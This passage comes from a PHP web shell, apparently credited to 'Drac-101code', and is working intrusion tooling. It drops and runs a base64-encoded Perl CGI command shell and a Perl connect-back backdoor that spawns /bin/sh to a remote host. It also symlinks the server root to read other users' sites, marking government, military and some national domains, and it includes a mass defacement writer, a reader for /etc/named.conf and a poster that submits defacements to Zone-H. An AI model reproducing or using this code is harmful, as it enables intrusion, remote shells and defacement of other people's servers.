  1814. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
  1815. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
  1816. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
  1817. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
  1818. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
  1819. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
  1820. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
  1821. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
  1822. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
  1823. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
  1824. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
  1825. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
  1826. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
  1827. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
  1828. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1829. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
  1830. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
  1831. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
  1832. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
  1833. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1834. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
  1835. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
  1836. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
  1837. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
  1838. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
  1839. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
  1840. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
  1841. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
  1842. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
  1843. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
  1844. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
  1845. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1846. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
  1847. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
  1848. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
  1849. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
  1850. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
  1851. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1852. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1853. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
  1854. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
  1855. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
  1856. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
  1857. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
  1858. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
  1859. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
  1860. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
  1861. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
  1862. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
  1863. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1864. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
  1865. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
  1866. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
  1867. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
  1868. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1869. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
  1870. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
  1871. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
  1872. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
  1873. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
  1874. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
  1875. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
  1876. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
  1877. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
  1878. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
  1879. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
  1880. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
  1881. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
  1882. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
  1883. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
  1884. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
  1885. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
  1886. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
  1887. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
  1888. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
  1889. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1890. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
  1891. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
  1892. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
  1893. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
  1894. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
  1895. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1896. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
  1897. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
  1898. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
  1899. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
  1900. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
  1901. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
  1902. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
  1903. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
  1904. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
  1905. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
  1906. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
  1907. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
  1908. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
  1909. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1910. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
  1911. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1912. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1913. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
  1914. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
  1915. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
  1916. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
  1917. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
  1918. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
  1919. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
  1920. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
  1921. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
  1922. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
  1923. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
  1924. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
  1925. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
  1926. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
  1927. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
  1928. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
  1929.  
  1930. $file = fopen("izo.cin" ,"w+");
  1931. $write = fwrite ($file ,base64_decode($cgishellizocin));
  1932. fclose($file);
  1933.     chmod("izo.cin",0755);
  1934. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  1935. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  1936. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  1937. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  1938. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  1939. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  1940. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  1941. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  1942. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  1943. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  1944. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  1945. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  1946. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  1947. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  1948. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  1949. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  1950. YXRhY2hlZFxuXG4iOw==';
  1951.  
  1952. $file = fopen("dc.pl" ,"w+");
  1953. $write = fwrite ($file ,base64_decode($netcatshell));
  1954. fclose($file);
  1955.     chmod("dc.pl",0755);
  1956.    echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
  1957. echo '</div>';
  1958. printFooter();
  1959.  
  1960. }
  1961.  
  1962.  
  1963. function actionSymlink(){
  1964.  
  1965. printHeader();
  1966.  
  1967. echo '<form action="" method="post">';
  1968.  
  1969. @set_time_limit(0);
  1970.  
  1971. echo "<center>";
  1972.  
  1973. @mkdir('sym',0777);
  1974. $htaccess  = "Options all \n DirectoryIndex readme.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1975. $write =@fopen ('sym/.htaccess','w');
  1976. fwrite($write ,$htaccess);
  1977. @symlink('/','sym/root');
  1978. $filelocation = basename(__FILE__);
  1979. $read_named_conf = @file('/etc/named.conf');
  1980. if(!$read_named_conf)
  1981. {
  1982. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1983. }
  1984. else
  1985. {
  1986. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  1987. foreach($read_named_conf as $subject){
  1988. if(eregi('zone',$subject)){
  1989. preg_match_all('#zone "(.*)"#',$subject,$string);
  1990. flush();
  1991. if(strlen(trim($string[1][0])) >2){
  1992. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  1993. $name = $UID['name'] ;
  1994. @symlink('/','sym/root');
  1995. $name   = $string[1][0];
  1996. $iran   = '\.ir';
  1997. $israel = '\.il';
  1998. $indo   = '\.id';
  1999. $sg12   = '\.sg';
  2000. $edu    = '\.edu';
  2001. $gov    = '\.gov';
  2002. $gose   = '\.go';
  2003. $gober  = '\.gob';
  2004. $mil1   = '\.mil';
  2005. $mil2   = '\.mi';
  2006. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  2007. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  2008. {
  2009. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  2010. }
  2011. echo "
  2012. <tr>
  2013.  
  2014. <td>
  2015. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  2016. </td>
  2017.  
  2018. <td>
  2019. '.$UID['name']."
  2020. </td>
  2021.  
  2022. <td>
  2023. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  2024. </td>
  2025.  
  2026. </tr></div> ";
  2027. flush();
  2028. }
  2029. }
  2030. }
  2031. }
  2032.  
  2033. echo "</center></table>";  
  2034. printFooter();
  2035. }
  2036.  
  2037. function actionDeface(){
  2038. printHeader();
  2039. echo "<h1>Single User Mass Deface</h1><div class=content>";
  2040.  
  2041. ?>
  2042. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
  2043. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd();?>">
  2044. <br>file name : <input type=text name=file size=20 value="readme.html">
  2045. <br>Text Content : <input type=text name=Contents size=20 value="musuh utama kita adalah nafsu, munafik dan kafir dalam diri kita, <br><br>- Drac-101code">
  2046. <br><input type=submit value="Update"></p></form>
  2047.  
  2048. <?php
  2049. if($_POST['a'] == 'Deface'){
  2050. $mainpath=$_POST[p1];
  2051. $file=$_POST[p2];
  2052. $txtContents=$_POST[p3];
  2053. echo "-----------------------------------------------<br>
  2054. [+] Single user Mass defacer<br>
  2055. -----------------------------------------------<br><br> ";
  2056. $dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
  2057. while($row=readdir($dir))
  2058. {
  2059. $start=@fopen("$row/$file","w+");
  2060. $code=$txtContents;
  2061. $finish=@fwrite($start,$code);
  2062. if ($finish)
  2063. {
  2064. echo "$row/$file > Done<br><br>";
  2065. }
  2066. }
  2067. echo "-----------------------------------------------<br><br>[+] Script by Drac-101code ...";
  2068. }
  2069. echo '</div>';
  2070. printFooter();
  2071. }
  2072.  
  2073.  
  2074. /* test function - reserved by Drac-101code */
  2075. function actionTest(){
  2076. printHeader();
  2077. echo '<h1>Testing function</h1><div class=content>';
  2078. echo '<br>';
  2079.  
  2080. ?>
  2081. <form action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.fname.value);return false;">
  2082. Name: <input type="text" name="fname" />
  2083. <input type="submit" value=">>">
  2084. </form>
  2085. </br>
  2086. <?php
  2087.  
  2088. if($_POST['a'] == 'Test') {
  2089. $out = $_POST['p1'];
  2090. echo "name : $out";
  2091.  
  2092.     }
  2093. echo '</div>';
  2094. printFooter();
  2095. }
  2096.  
  2097. function actionDomain(){
  2098. printHeader();
  2099. echo '<h1>local domain viewer</h1><div class=content>';
  2100.  
  2101. $file = @implode(@file("/etc/named.conf"));
  2102. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  2103. preg_match_all("#named/(.*?).db#",$file ,$r);
  2104. $domains = array_unique($r[1]);
  2105. //check();
  2106. //if(isset($_GET['ShowAll']))
  2107. {
  2108. echo "<table align=center border=1 width=59% cellpadding=5>
  2109. <tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
  2110. <tr><td>Domain</td><td>User</td></tr>";
  2111. foreach($domains as $domain){
  2112. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  2113.  
  2114.         echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  2115.         }
  2116.     echo "</table>";
  2117.     }
  2118.  
  2119. echo '</div>';
  2120. printFooter();
  2121. }
  2122.  
  2123. function actionZHposter(){
  2124. printHeader();
  2125. echo '<h1>Zone-H Poster</h1><div class=content>';
  2126.  
  2127. echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
  2128. <input type="text" name="p1" size="40" value="Attacker" /></br>
  2129. <select name="p2">
  2130. <option >--------SELECT--------</option>
  2131. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2132. <option value="2" >undisclosed (new) vulnerability</option>
  2133. <option value="3" >configuration / admin. mistake</option>
  2134. <option value="4" >brute force attack</option>
  2135. <option value="5" >social engineering</option>
  2136. <option value="6" >Web Server intrusion</option>
  2137. <option value="7" >Web Server external module intrusion</option>
  2138. <option value="8" >Mail Server intrusion</option>
  2139. <option value="9" >FTP Server intrusion</option>
  2140. <option value="10" >SSH Server intrusion</option>
  2141. <option value="11" >Telnet Server intrusion</option>
  2142. <option value="12" >RPC Server intrusion</option>
  2143. <option value="13" >Shares misconfiguration</option>
  2144. <option value="14" >Other Server intrusion</option>
  2145. <option value="15" >SQL Injection</option>
  2146. <option value="16" >URL Poisoning</option>
  2147. <option value="17" >File Inclusion</option>
  2148. <option value="18" >Other Web Application bug</option>
  2149. <option value="19" >Remote administrative panel access bruteforcing</option>
  2150. <option value="20" >Remote administrative panel access password guessing</option>
  2151. <option value="21" >Remote administrative panel access social engineering</option>
  2152. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2153. <option value="23" >Access credentials through Man In the Middle attack</option>
  2154. <option value="24" >Remote service password guessing</option>
  2155. <option value="25" >Remote service password bruteforce</option>
  2156. <option value="26" >Rerouting after attacking the Firewall</option>
  2157. <option value="27" >Rerouting after attacking the Router</option>
  2158. <option value="28" >DNS attack through social engineering</option>
  2159. <option value="29" >DNS attack through cache poisoning</option>
  2160. <option value="30" >Not available</option>
  2161. </select>
  2162. </br>
  2163. <select name="p3">
  2164. <option >--------SELECT--------</option>
  2165. <option value="1" >Heh...just for fun!</option>
  2166. <option value="2" >Revenge against that website</option>
  2167. <option value="3" >Political reasons</option>
  2168. <option value="4" >As a challenge</option>
  2169. <option value="5" >I just want to be the best defacer</option>
  2170. <option value="6" >Patriotism</option>
  2171. <option value="7" >Not available</option>
  2172. </select>
  2173. </br>
  2174. <textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
  2175. <input type="submit" value="Send Now !" />
  2176. </form>';
  2177. echo "</td></tr></table></form>";
  2178.  
  2179. if($_POST['a'] == 'ZHposter')
  2180. {
  2181.                 ob_start();
  2182.                 $sub = @get_loaded_extensions();
  2183.                 if(!in_array("curl", $sub))
  2184.                 {
  2185.                     die('[-] Curl Is Not Supported !! ');
  2186.                 }
  2187.            
  2188.                 $hacker9 = $_POST['p1'];
  2189.                 $method9 = $_POST['p2'];
  2190.                 $neden9 = $_POST['p3'];
  2191.                 $site9 = $_POST['p4'];
  2192.                
  2193.                 if (empty($hacker9))
  2194.                 {
  2195.                     die ("[-] You Must Fill the Attacker name !");
  2196.                 }
  2197.                 elseif($method9 == "--------SELECT--------")
  2198.                 {
